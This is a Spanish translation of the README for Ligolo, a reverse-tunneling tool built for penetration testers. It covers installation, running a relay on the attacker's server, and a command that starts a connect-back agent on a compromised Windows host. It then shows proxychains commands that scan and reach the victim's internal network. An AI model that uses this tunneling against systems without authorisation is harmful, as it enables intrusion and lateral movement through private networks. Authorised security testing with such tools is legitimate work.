
Túneles inversos simplificados para pentesters, por pentesters https://sysdream.com/

Ligolo es una herramienta simple y ligera para establecer túneles SOCKS5 o TCP desde una conexión inversa con total seguridad (certificado TLS con curva elíptica).
Es comparable a Meterpreter con Autoroute + Socks4a, pero más estable y rápido.
Has comprometido un servidor Windows/Linux/Mac durante tu auditoría externa. Este servidor se encuentra dentro de una red LAN y deseas establecer conexiones a otras máquinas en esa red.
Ligolo puede configurar un túnel para acceder a los recursos del servidor interno.
Relevo de una conexión RDP usando Proxychains (WAN).

Aquí hay una captura de pantalla de una prueba de velocidad entre dos hosts de 100mb/s (ligolo/localrelay). El rendimiento puede variar según la configuración del sistema y la red.

Asegúrate de que Go esté instalado y funcionando.
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
make certs TLS_HOST=example.com
NOTA: También puedes usar tus propios certificados usando la opción de make TLS_CERT al llamar a build. Ejemplo: make build-all TLS_CERT=certs/mycert.pem.
make build-all
make build
Ligolo consta de dos módulos:
Localrelay está destinado a ejecutarse en el servidor de control (el servidor atacante).
Ligolo es el programa que se ejecuta en la computadora objetivo.
Para localrelay, puedes dejar las opciones predeterminadas. Escuchará en todas las interfaces en el puerto 5555 y esperará conexiones de ligolo (parámetro -relayserver).
Para ligolo, debes especificar la dirección IP del servidor de relevo (o tu servidor de ataque) usando el parámetro -relayserver ip:port.
Puedes usar la opción -h para obtener ayuda.
Una vez que se haya establecido la conexión entre Ligolo y LocalRelay, se configurará un proxy SOCKS5 en el puerto TCP 1080 en el servidor de relevo (puedes cambiar la dirección/puerto TCP usando la opción -localserver).
Después de eso, solo tienes que usar tu herramienta favorita (Proxychains, por ejemplo) y explorar la red LAN del cliente.
En tu servidor de ataque.
./bin/localrelay_linux_amd64
En el host comprometido.
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555
Una vez establecida la conexión, configura los siguientes parámetros en el archivo de configuración de ProxyChains (en el servidor de ataque):
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
Benefíciate.
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123
Opciones de localrelay:
Usage of localrelay:
-certfile string
The TLS server certificate (default "certs/server.crt")
-keyfile string
The TLS server key (default "certs/server.key")
-localserver string
The local server address (your proxychains parameter) (default "127.0.0.1:1080")
-relayserver string
The relay server listening address (the connect-back address) (default "0.0.0.0:5555")
Opciones de ligolo:
Usage of ligolo:
-autorestart
Attempt to reconnect in case of an exception
-relayserver string
The relay server (the connect-back address) (default "127.0.0.1:5555")
-skipverify
Skip TLS certificate pinning verification
-targetserver string
The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server
GNU General Public License v3.0 (Ver LICENSING).